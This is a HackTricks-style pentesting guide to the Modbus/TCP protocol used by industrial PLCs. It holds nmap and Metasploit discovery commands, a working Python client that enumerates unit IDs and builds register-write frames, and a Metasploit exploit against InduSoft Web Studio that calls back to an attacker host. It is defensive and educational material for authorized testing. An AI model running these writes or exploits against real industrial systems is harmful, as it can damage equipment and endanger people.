<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
In 1979 Modicon (now Schneider Electric) published the **Modbus Protocol**, a simple request/response messaging structure for exchanging data between PLCs and other industrial devices under a master-slave (client-server) model. Modbus/TCP wraps the same PDUs in a small MBAP header and listens on **TCP port 502**. The protocol carries no authentication and no encryption: any host that can reach the port can read and write coils and registers, which is why enumeration on an OT network is usually already most of the attack.
The first step is to find hosts listening on 502/TCP with `nmap`. The `modbus-discover` NSE script then confirms the service by sending device-identification requests (Report Server ID, function code 17, and Read Device Identification) and, in aggressive mode, enumerates the unit IDs (slave IDs) that answer.
```bash
nmap -p 502 <target_ip>
nmap -p 502 --script modbus-discover --script-args='modbus-discover.aggressive=true' <target_ip>
```
### Metasploit
Metasploit ships its Modbus modules under `auxiliary/scanner/scada/`: `modbusdetect` checks whether a host speaks Modbus/TCP, `modbus_findunitid` brute-forces the unit ID, and `modbusclient` reads and writes coils/registers (used below). For discovery use `modbusdetect`:
```bash
use auxiliary/scanner/scada/modbusdetect
set RHOSTS <target_ip>
run
```
## Modbus Enumeration
Once a Modbus service is identified, enumerate which unit IDs (0-247) answer and what each exposes in its four object tables: coils, discrete inputs, input registers and holding registers. The register map is vendor-specific, so read a range and watch for exception code 2 (ILLEGAL DATA ADDRESS) to find the boundaries.
### Modscan
ModScan is a popular Modbus enumeration tool. The name is shared by ModScan32, a commercial Windows Modbus master, and `modscan.py`, a Python scanner that brute-forces unit IDs. Both poll a device's coils and registers and show the raw values and exception codes it returns.
## Modbus Exploitation
Because Modbus has no authentication, "exploitation" rarely needs a software bug: once the units and registers are known, any client that can reach port 502 can issue write requests (function codes 5, 6, 15 and 16) and change coils and registers, that is, the physical process behind them. Do this only on a test bench or with explicit written authorization; writes to a live PLC can damage equipment or endanger people.
### Modbus Client
A Modbus client (master) lets you craft individual requests, choosing the unit ID, function code, starting address and the quantity or value, and inspect the raw response including any exception code. Metasploit's `auxiliary/scanner/scada/modbusclient` does this through its `ACTION` option (`READ_COILS`, `READ_REGISTERS`, `WRITE_COIL`, `WRITE_REGISTER`, ...) together with `UNIT_NUMBER` and `DATA_ADDRESS`; the generic command below stands for whichever standalone client you use.
```bash
modbusclient.exe <target_ip>
```
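To make the enumeration and custom-request steps above concrete, here is a minimal Modbus/TCP client written for this page as an added example; it is not code from ModScan, Metasploit or any other tool named here. It builds the MBAP header and PDU, probes unit IDs by distinguishing gateway exceptions (0x0A/0x0B, no device behind that ID) from real answers, decodes a Read Holding Registers (FC 3) response and builds the Write Single Register (FC 6) request used in the exploitation step. Only the standard library is used; the frames in `demo()` are constructed for offline illustration, and the host passed on the command line is assumed to be a lab device you are authorized to touch.

```python
"""Minimal Modbus/TCP client (added example, standard library only)."""
import socket
import struct

MODBUS_TCP_PORT = 502
FC_READ_HOLDING_REGISTERS = 0x03
FC_WRITE_SINGLE_REGISTER = 0x06

# Exception codes from the Modbus Application Protocol specification.
EXCEPTION_NAMES = {
    0x01: "ILLEGAL FUNCTION",
    0x02: "ILLEGAL DATA ADDRESS",
    0x03: "ILLEGAL DATA VALUE",
    0x04: "SERVER DEVICE FAILURE",
    0x0A: "GATEWAY PATH UNAVAILABLE",
    0x0B: "GATEWAY TARGET DEVICE FAILED TO RESPOND",
}
# A gateway answers with these when nothing sits behind the requested unit id;
# any other reply (data or a different exception) means a device is present.
NO_SUCH_UNIT = {0x0A, 0x0B}


def build_request(tid, unit_id, function, data=b""):
    """MBAP header: transaction id, protocol id (0 = Modbus), length of
    everything after the length field (unit id + PDU), unit id; then the PDU."""
    pdu = bytes([function]) + data
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit_id) + pdu


def read_holding_registers(tid, unit_id, address, count):
    return build_request(tid, unit_id, FC_READ_HOLDING_REGISTERS,
                         struct.pack(">HH", address, count))


def write_single_register(tid, unit_id, address, value):
    return build_request(tid, unit_id, FC_WRITE_SINGLE_REGISTER,
                         struct.pack(">HH", address, value))


def parse_response(frame):
    """Split a response into header fields plus either 'data' (PDU payload)
    or 'exception' (function code with bit 7 set followed by one code byte)."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus" % proto)
    if length != len(frame) - 6:
        raise ValueError("MBAP length %d does not match frame" % length)
    function = frame[7]
    resp = {"tid": tid, "unit": unit, "function": function & 0x7F}
    if function & 0x80:
        if len(frame) < 9:
            raise ValueError("exception response without exception code")
        resp["exception"] = frame[8]
        resp["exception_name"] = EXCEPTION_NAMES.get(frame[8], "UNKNOWN")
    else:
        resp["data"] = frame[8:]
    return resp


def decode_holding_registers(resp):
    """FC 3 payload: one byte count, then big-endian 16-bit register values."""
    data = resp["data"]
    count = data[0]
    if count % 2 or len(data) != count + 1:
        raise ValueError("byte count %d disagrees with payload" % count)
    return list(struct.unpack(">%dH" % (count // 2), data[1:]))


def unit_is_present(frame):
    """Unit-id probe verdict: data or a non-gateway exception means a device
    answered for that id; gateway exceptions 0x0A/0x0B mean none did."""
    return parse_response(frame).get("exception") not in NO_SUCH_UNIT


def query(host, request, timeout=2.0, port=MODBUS_TCP_PORT):
    """Send one request over TCP and return the raw reply (None on timeout)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        try:
            return s.recv(260)  # maximum Modbus/TCP ADU is 260 bytes
        except socket.timeout:
            return None


def find_unit_ids(host, unit_ids=range(0, 248)):
    """Probe each unit id with a one-register read of address 0 (FC 3).
    Silence is treated as absent; many devices only answer their own id."""
    found = []
    for tid, uid in enumerate(unit_ids, start=1):
        frame = query(host, read_holding_registers(tid, uid, 0, 1))
        if frame and unit_is_present(frame):
            found.append(uid)
    return found


def demo():
    # Constructed frames, not captured: unit 1 returns registers 0x0001 and
    # 0x1234; a probe of unit 5 gets gateway exception 0x0B (no such unit).
    ok = bytes.fromhex("0001 0000 0007 01 03 04 0001 1234")
    gone = bytes.fromhex("0002 0000 0003 05 83 0B")
    return decode_holding_registers(parse_response(ok)), unit_is_present(gone)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # lab device you are authorized to probe (assumed)
        print("live unit ids:", find_unit_ids(sys.argv[1]))
    else:
        print(demo())
```

The write path is deliberately limited to building the frame: sending `write_single_register(...)` through `query()` is the actual exploitation step, and the device echoes the request back as its response, so `parse_response()` on the reply tells you whether the write was accepted or rejected with an exception.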
### Metasploit
Metasploit also carries exploits for the SCADA/HMI software that sits on the same network as the PLCs. These target the vendor application, not the Modbus protocol itself, but compromising the HMI host yields a Modbus master that is already trusted by the PLCs. For example, `exploit/windows/scada/indusoft_webstudio_exec` attacks the Remote Agent component of InduSoft Web Studio (TCP 4322) for code execution:
```bash
use exploit/windows/scada/indusoft_webstudio_exec
set RHOSTS <target_ip>
set LHOST <attacker_ip>
run
```
## Conclusion
Enumeration is the crucial step in Modbus pentesting. Once the hosts on 502/TCP, their unit IDs and their register maps are known, the lack of authentication means reading and writing those registers needs no further vulnerability; exploits against the surrounding SCADA/HMI software are a complementary route onto the same network.